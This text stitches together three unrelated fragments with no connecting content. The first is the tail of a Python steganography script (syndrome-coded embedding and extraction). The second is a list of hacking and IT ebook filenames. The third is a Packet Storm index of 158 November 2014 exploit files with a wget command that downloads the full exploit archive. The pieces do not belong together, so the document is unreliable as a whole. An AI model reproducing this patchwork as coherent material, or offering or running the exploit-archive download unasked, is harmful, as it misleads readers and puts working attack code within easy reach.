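    changed = sum(a != b for a, b in zip(carrier, stego))
    return stego, changed

def extract(stego: List[int], nbytes: int, k: int) -> bytes:
    """Recover nbytes of message from the syndromes of consecutive blocks."""
    n = (1 << k) - 1
    nblocks = -(-(nbytes * 8) // k)  # ceil(nbytes * 8 / k)
    bits: List[int] = []
    for c in range(nblocks):
        s = syndrome(stego[c * n:(c + 1) * n])
        bits += [(s >> (k - 1 - j)) & 1 for j in range(k)]
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, nbytes * 8, 8))

if __name__ == "__main__":
    cover = [0, 1] * 32  # constructed carrier standing in for coefficient LSBs
    stego, changed = embed(cover, b"F5", k=3)  # 16 bits -> 6 blocks of 7 bits
    print(extract(stego, 2, k=3), "bits changed:", changed)  # b'F5', <= 6
```

With k=3 the 16 message bits cost at most 6 flipped carrier bits instead of up to 16 with plain LSB replacement, which is the efficiency gain the post refers to.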
-
List of the books:
AndroidHackersHandbook.acsm
AndroidProgrammingPushingLimi.acsm
ArtofMemoryForensicsDetecting.acsm
BeginningPHP53.acsm
BrowserHackersHandbook.acsm
BuildingPHPApplicationswithSy.acsm
CEHCertifiedEthicalHackerVers.acsm
CEH-Handbook-v1.9.pdf
CEHv8-Exam-Blueprint-v1.1-17012012.pdf
DesignforHackersReverseEngine.acsm
GhostintheWiresByKevinMitnick.pdf
Hacking Point of Sale.pdf
HTMLandCSS.acsm
Indy-in-Depth.pdf
iOS7ProgrammingPushingLimits.acsm
JavaScriptProgrammingPushingL.acsm
LPIC1LinuxProfessionalInstitu.acsm
[Megafileupload]Cybercrime legislation EV6 %281%29.pdf
MicrosoftSQLServer2012Adminis.acsm
PhotoshopCCBible.acsm
ProfessionalMicrosoftSQLServe.acsm
RealWorldSolutionsforDevelopi.acsm
WebApplicationDefendersCookbo.acsm
Wiley_-_CMS_Security_Handbook_[]_(2011)_en.PDF
Windows7SecretsSecrets140.acsm
Windows8Secrets.acsm
WindowsPhone7Secrets.acsm
WindowsServer2008R2Secrets.acsm
WindowsVistaSecrets.acsm
XDADevelopersAndroidHackersTo.acsm
-
This archive contains all of the 158 exploits added to Packet Storm in November, 2014. 1411-exploits# ls ahrareandeysheh-xss.txt openkm-xss.txt anchorcms-inject.txt openxchange-sql.txt android-appleak.txt ossec-escalate.txt android-escalate.txt paidmembershipspro-traversal.txt android-smsresend.txt pandorafms51-xss.txt androidwappushmanager-sql.txt pandora_fms_sqli.rb.txt apadanacms-sql.txt parsadevcms-xss.txt atlasaeon-xss.txt php-5x-bash-shellshock.txt booking-redirect.txt phpbbderegglobal-bypass.txt cchwolters-escalate.txt phpfoxadmin-xss.txt citrix_netscaler_soap_bof.rb.txt phpfusion70207-sql.txt cnilcookieviz-sqlxss.txt phpparselocale-doublefree.tgz CORE-2014-0009.txt phpsoundmsp-xss.txt CVE-2014-6352.rar piwigo260-sql.txt device42-creds.txt planetsourcecode-sqlxssshell.txt device42_ping_exec.rb.txt pmp-sql.txt device42_tracert_exec.rb.txt progressopenedge-traversal.txt digionline-shell.txt proticaret-sql.txt dlinkdap1360-xsrf.txt pwn.c dlinkdap1360-xssxsrf.txt robotstats-sql.txt dlinkdcs2103-traversal.txt robotstats-xss.txt dolibarrerpcrm-sql.txt SA-20141106-0.txt drupalvideowhisper-xss.txt safari8-dos.txt eleanorcms-redirect.txt samsung_knox_smdm_url.rb.txt ellislab-sql.txt scmp-xss.txt esotalkcms-xss.txt secuid0.advisory.CVE-2014-8727.txt exploiting_sudo_grace_period.pdf sliderrevshowbiz-shell.txt ExploitRemotingService-master.zip sniffit-escalate.txt fasthealth-redirect.txt softing-backdoor.txt flatnuke31x-xss.txt softing-xss.txt fluxbb-sql.txt springsharelibcal-xss.txt formalms-xss.txt STIC-2014-0426.txt glance-escalate.txt tcpdumpgeonet-dos.txt glibc-libmemusage-1x-2x.sh.txt tcpdumposlr-dos.txt glibc-libpcprofile-1x-2x.sh.txt tcpdump-output.txt gogslabel-sql.txt tinyserver119-disclose.txt gogsrepo-sql.txt vbulletin421-redirect.txt gogs-xss.txt videostube-sqlxssshell.txt googledoubleclick-redirect.txt visual_mining_netcharts_upload.rb.txt helpdezk-upload.txt VL-1048.txt hikvision_rtsp_bof.rb.txt VL-1347.txt ie8ms14035-useafterfree.txt VL-1351.txt 
ieolepreie11-exec.txt VL-1353.txt iftp-overflow.txt VL-936.txt ihex-poc.txt weatherchannel-xss.txt image-poc.txt websitebaker283-sqlxss.txt indiatimes-xss.txt whoswho-xsrf.txt ioslaves-validation.txt wp40-dos.txt ipboard347-sql.txt wpadmanager-redirect.txt jexperts-escalate.txt wpawpclassifieds-sqlxss.txt jexperts-xss.txt wpbulletproofsecurity-ssrfxsssql.txt joomlaeventbooking-xss.txt wpcleansimple-xss.txt joomlahdflv-download.txt wpcmdownloadmanager-exec.txt joomlahdflv-sql.txt wpdbbackup-bruteforce.txt joomlasef-xss.txt wphtml5mp3-disclosure.txt KIS-2014-13.txt wpsexysqueeze-xss.txt KL-001-2014-004.txt wpspclientdocumentmanager-sql.txt kmplayer391130-dos.txt wpsupportezzy-xss.txt koschtit-xss.txt wpwpdatatables-shell.txt lantronix-exec.txt wpwpdatatables-sql.txt maarchletterbox-sqlbypass.txt x3cms-xsrfxss.txt manageengineea-disclose.txt x7chat2_php_exec.rb.txt mantisbt_php_exec.rb.txt xcloner-execdisclosebypass.txt meomsitpit360-sqlexecupload.txt xepan-xsrf.txt minix-dos.tgz xoops256-sql.txt minix_inet_dos.c zoph-sqlxss.txt mit-redirect.txt ZSL-2014-5204.tgz monstra-bypass.txt ZSL-2014-5205.txt monstra-hrs.txt ZSL-2014-5206.txt mousemediascript160-xss.txt ZSL-2014-5207.txt mozillafirefox36-useafterfree.txt ZSL-2014-5208.txt ms14_064_ie_olerce.rb.txt ZSL-2014-5209.txt ms14_064_ole_code_execution.rb.txt ZSL-2014-5210.txt ms14_064_packager_python.rb.txt ZSL-2014-5211.tgz ms14_064_packager_run_as_admin.rb.txt zte831cii-xsrfxsshardcoded.txt msiis75-xss.txt ztezxdsi-insecure.txt mybb181-sqlxss.txt ztezxdsl831-xss.txt mybb-bypassexec.txt ztezxhnh108l-bypass.txt nibbleblog-xss.txt zxdsl831cii-xsrf.txt
wget http://packetstorm.interhost.co.il/1411-exploits/1411-exploits.tgz
Packet Storm New Exploits For November, 2014 (Packet Storm)